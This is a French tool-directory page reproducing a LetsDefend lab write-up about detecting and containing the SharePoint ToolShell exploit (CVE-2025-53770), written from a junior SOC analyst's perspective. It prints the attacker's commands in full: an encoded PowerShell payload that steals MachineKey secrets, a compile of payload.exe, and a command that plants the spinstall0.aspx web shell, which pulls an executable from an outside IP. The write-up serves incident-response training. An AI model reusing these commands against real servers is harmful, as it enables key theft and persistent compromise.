Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend — Guide pas à pas de l'exploitation de CVE-2025-53770 (ToolShell) dans un lab LetsDefend, couvrant le RCE, le déploiement de web shell et l'analyse de réponse aux incidents. | Kitploit
Outils/GitHubGitHub/cyprianatsyor/toolshell-cve-2025-53770-sharepoint-exploit-lab-letsdefend
Analyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse de MalwareCriminalistique NumériqueCTFTests d'IntrusionCommandement et ContrôleApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Réponse aux Incidents
Développement de Charges Utiles
Labs et Pratique
GitHubcyprianatsyor/toolshell-cve-2025-53770-sharepoint-exploit-lab-letsdefend

ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

Guide pas à pas de l'exploitation de CVE-2025-53770 (ToolShell) dans un lab LetsDefend, couvrant le RCE, le déploiement de web shell et l'analyse de réponse aux incidents.

Voir le dépôt
il y a 1 anPas encore vérifié
Partager

ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

TL;DR Yo, dans ce lab LetsDefend, j'ai plongé dans un zero-day SharePoint appelé ToolShell (CVE-2025-53770). En gros, j'ai reproduit une attaque réelle où une requête POST malveillante contournait l'authentification, exécutait PowerShell pour voler les clés MachineKeySection, compilait payload.exe et déposait un web shell (spinstall0.aspx). J'ai tout journalisé, analysé le comportement et contenu l'hôte. Ce README couvre l'attaque, mes étapes et les leçons apprises.

Aperçu du lab

  • Plateforme : LetsDefend Cyber Range
  • Cible : Serveur SharePoint (SharePoint01)
  • CVE : CVE-2025-53770
  • Objectif : Analyser l'exécution de code à distance (RCE), pratiquer la détection et le confinement

Outils utilisés :

Windows PowerShell

VirusTotal

AbuseIPDB

Gestion des journaux LetsDefend

Sécurité des endpoints LetsDefend

Renseignement sur les menaces LetsDefend


Détail de l'image d'alerte

Détail de l'image d'alerte

EventID : 320

Heure de l'événement : Jul, 22, 2025, 01:07 PM

Règle : SOC342 - CVE‑2025‑53770 SharePoint ToolShell Contournement d'authentification et RCE

Niveau : Analyste de sécurité

Nom d'hôte : SharePoint01

Adresse IP source : 107.191.58.76

Adresse IP de destination : 172.16.20.17

Méthode de requête HTTP : POST

URL demandée : /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0

Referer : /_layouts/SignOut.aspx

Content-Length : 7699

Raison du déclenchement de l'alerte : Requête POST non authentifiée suspecte ciblant ToolPane.aspx avec une charge utile de grande taille et un referer usurpé indiquant une exploitation de CVE-2025-53770.

Action de l'appareil : Autorisée


Vue d'ensemble Le 22 juillet 2025, notre surveillance de sécurité a signalé une attaque zero-day critique ciblant une instance de SharePoint sur site nommée SharePoint01.

Détails de la CVE :

  • ID CVE : CVE-2025-53770
  • Sévérité : Critique (CVSS 9.8)
  • Type d'exploit : Exécution de code à distance (RCE) via une vulnérabilité de désérialisation
  • Divulgation : Connue publiquement le 19 juillet 2025
  • Correctif publié : 20–21 juillet 2025

Catalogue KEV de la CISA : Entrée publiée le 20 juillet 2025

Vecteur d'attaque : Requête POST vers le point de terminaison /ToolPane.aspx, en-tête referer usurpé, charge utile malveillante de grande taille

Source : IP 107.191.58.76, Vultr Holdings, LLC, États-Unis


À propos de SharePoint Microsoft SharePoint est le socle de la collaboration d'entreprise et de la gestion documentaire. C'est essentiellement un espace sécurisé et organisé, de type cloud, pour les fichiers, les flux de travail et les applications internes.

Principales utilisations :

Gestion documentaire : Versioning, pistes d'audit, contrôle des fichiers

Collaboration : Plusieurs utilisateurs modifiant le même document simultanément

Portails web internes : Actualités, mises à jour, informations RH, politiques

Flux de travail automatisés : Approbations, formulaires, notifications

Intégration : Étroitement lié à Teams, Outlook, la suite Office, Power BI

Considérations de sécurité :

Authentification : AD ou SSO

Chiffrement : Données au repos et en transit

Web Parts et layouts : Peuvent être exploités en cas de mauvaise configuration

Gestion des correctifs : Essentielle pour prévenir les attaques zero-day


Qu'est-ce que CVE-2025-53770 ?---

CVE-2025-53770, également appelée ToolShell, est un zero-day SharePoint exploité dans la nature. C'est une vulnérabilité critique de désérialisation dans les serveurs Microsoft SharePoint sur site qui permet l'exécution de code à distance (RCE) sans authentification. Elle s'associe à d'autres failles SharePoint (CVE-2025-49704 et CVE-2025-49706) pour compromettre entièrement les systèmes. Elle a un score CVSS de 9,8, ce qui signifie qu'elle est critique.

Que font les attaquants ?---

Ils téléchargent des web shells malveillants comme spinstall0.aspx via le point de terminaison ToolPane.aspx en utilisant des en-têtes referer usurpés pour contourner l'authentification.

Ils extraient des valeurs MachineKey critiques de la configuration SharePoint afin de générer des charges utiles ViewState de confiance pour un accès persistant.

puis déploient plus tard des rançongiciels (par exemple, la souche « Warlock ») ou exfiltrent des identifiants et installent des backdoors.

Première divulgation publique : 19 juillet 2025 (blog Microsoft)

Correctifs publiés : 20–21 juillet 2025

Entrée dans le catalogue KEV de la CISA : 20 juillet 2025


Analyse de l'attaque

J'ai analysé l'adresse IP de l'expéditeur (adresse IP source) sur VirusTotal.

Adresse IP source : 107.191.58.76

Résultat de VirusTotal

À partir de là, je sais déjà que l'IP est malveillante.

Je dois maintenant rechercher la localisation de l'IP à l'aide d'AbuseIPDB.

AbuseIPDB

Voici ce que j'ai obtenu :

ISP Vultr Holdings, LLC

Type d'utilisation - Data Center/Hébergement Web/Transit

ASN - AS20473

Nom(s) d'hôte - 107.191.58.76.vultrusercontent.com

Nom de domaine - vultr.com

Pays - États-Unis d'Amérique

Ville - Los Angeles, Californie

IP connue pour piratage, force brute, attaque d'application web, scan de ports, empoisonnement DNS


En tant qu'analyste junior, voici comment j'ai procédé. J'ai d'abord recherché l'hôte sur la sécurité des endpoints avec le nom « SharePoint01 ».

Sécurité des endpoints

Après avoir localisé l'hôte, je suis allé dans l'historique du terminal et j'ai trouvé une ligne de commande :

root@kitploit:~

Ligne de commande

Que fait cette commande ?

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" → Lance PowerShell directement depuis le répertoire système.

-nop

→ Aucun profil — ignore les scripts de profil PowerShell pour éviter la détection ou les interférences.

-w hidden

→ S'exécute avec une fenêtre masquée afin que l'utilisateur ne la voie pas.

-e

Décodons ceci :

root@kitploit:~
"PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg=="

Laissez-moi expliquer ce que fait le script ci-dessus.

Il importe :

-System.Diagnostics

-System.IO

⦁ puis exécute un script C# en ligne dans PowerShell qui :

-Charge les assemblys System.Web

-Accède à System.Web.Configuration.MachineKeySection

-Récupère les clés de validation et de déchiffrement depuis le web.config de la machine

-Les écrit ensuite dans la réponse, probablement pour les exfiltrer vers un attaquant.

L'attaquant a ensuite continué en envoyant cette commande :

root@kitploit:~
""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"

-csc.exe - un compilateur C# avec le framework .NET

-puis demande au compilateur d'enregistrer ce « payload.exe » sur l'hôte

cette charge utile pourrait être un logiciel malveillant.

Commande suivante de l'attaquant :

root@kitploit:~
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"

Ce qu'elle fait :

"C:\Windows\System32\cmd.exe" /c - Exécute la commande suivante dans l'invite de commandes, puis se termine.

echo <form runat=\"server\"> ... </form> - Écrit un petit morceau de balisage ASP.NET qui s'exécutera sur le serveur SharePoint.

Le balisage contient : <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"> - Ce CLSID est le contrôle ActiveX Shell (utilisé pour exécuter des commandes shell ou effectuer des actions spéciales dans un contexte IE/COM).

<param name="Command" value="Redirect"> - Indique à l'objet quelle action effectuer.

<param name="Url" value="http://107.191.58.76/payload.exe"> - Pointe vers un EXE malveillant hébergé sur un serveur distant — très probablement leur véritable malware.

Commande suivante de l'attaquant :

root@kitploit:~
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"

Encore une fois, ce qu'elle fait :

"C:\Windows\System32\cmd.exe" /c - Exécute la commande suivante dans l'invite de commandes, puis se termine.

echo <form runat=\"server\"> ... </form> - Écrit un petit morceau de balisage ASP.NET qui s'exécutera sur le serveur SharePoint.

Et aussi

Le balisage contient :

root@kitploit:~
<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
Ce CLSID est le contrôle ActiveX Shell (utilisé pour exécuter des commandes shell ou effectuer des actions spéciales dans un contexte IE/COM).

<param name="Command" value="Redirect"> - Indique à l'objet quelle action effectuer.

<param name="Url" value="http://107.191.58.76/payload.exe"> - Pointe vers un EXE malveillant hébergé sur un serveur distant — très probablement leur véritable malware.

> C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx - Enregistre tout cet objet HTML/ASP.NET malveillant sous le nom spinstall0.aspx dans le dossier layouts de SharePoint.

Tout ce qui se trouve dans ce dossier est accessible en accédant à la bonne URL sur le site SharePoint, ce qui signifie que l'attaquant dispose désormais d'une page web sur votre serveur qui déclenche l'action malveillante.

Les lignes de commande que j'ai trouvées sont ci-dessous :

Ligne de commande 2

Ligne de commande 3


Après avoir confirmé que c'était risqué, j'ai exploré les processus sur l'hôte.

Ça semblait suspect, grouillant de nombreux chemins de fichiers et d'exe.

Par curiosité, je suis allé dans la gestion des journaux et j'ai recherché l'IP malveillante dans les logs.

J'ai vu un journal brut avec une requête POST :

root@kitploit:~

avec un referer - /_layouts/SignOut.aspx

Je suis ensuite allé vérifier si l'attaque avait réussi.

Vous savez quoi ? Oui. J'ai donc dû la contenir pour le SOC2.

Voici ma note d'analyste :

Nous avons repéré une attaque critique exploitant une vulnérabilité zero-day appelée ToolShell (CVE-2025-53770) sur un serveur SharePoint sur site nommé SharePoint01. L'attaquant, depuis une IP malveillante connue (107.191.58.76), a envoyé une requête POST non authentifiée avec une énorme charge utile vers un point de terminaison SharePoint (ToolPane.aspx), contournant l'authentification pour exécuter du code à distance sur le serveur.

En creusant plus profondément, l'attaquant a exécuté des commandes PowerShell masquées qui décodaient des scripts Base64 afin de voler des valeurs MachineKey sensibles de SharePoint, ce qui lui a permis de fabriquer des charges utiles de confiance. Il a compilé un exécutable malveillant sur l'hôte, puis a déposé un web shell (spinstall0.aspx) dans le dossier layouts de SharePoint qui télécharge et exécute un malware depuis son serveur, offrant un accès backdoor persistant.

Après avoir confirmé la compromission, nous avons contenu l'hôte affecté et recommandé un correctif immédiat, car les correctifs avaient été publiés quelques jours plus tôt à peine. Nous recherchons également d'autres web shells, surveillons toute activité de rançongiciel ou de vol de données, et recommandons un renforcement de la sécurité autour des serveurs SharePoint pour éviter d'autres dommages.


Et la note à l'équipe :

Note à l'équipe : Salut l'équipe, nous avons détecté une exploitation critique du zero-day ToolShell (CVE-2025-53770) sur notre serveur SharePoint (SharePoint01). Un attaquant a utilisé une requête POST non authentifiée pour contourner l'authentification et exécuter du code à distance, en commençant par une charge utile suspecte de grande taille ciblant ToolPane.aspx.

L'attaquant a exécuté des commandes PowerShell masquées pour voler des clés machine SharePoint sensibles, puis a compilé et déposé un exécutable malveillant sur le système. Il a également créé un web shell (spinstall0.aspx) dans le dossier layouts de SharePoint, qui télécharge et exécute un malware depuis un serveur externe, lui donnant potentiellement un contrôle persistant.

Nous avons contenu l'hôte compromis et recommandons un correctif urgent, car les correctifs viennent tout juste d'être publiés. Nous recherchons également des web shells similaires et surveillons les signes de rançongiciel ou d'exfiltration de données. Restons vigilants et renforçons la sécurité de SharePoint à l'avenir.

C'EST FAIT

Voici mon résultat

Résultat sur LetsDend

Télécharger l’outil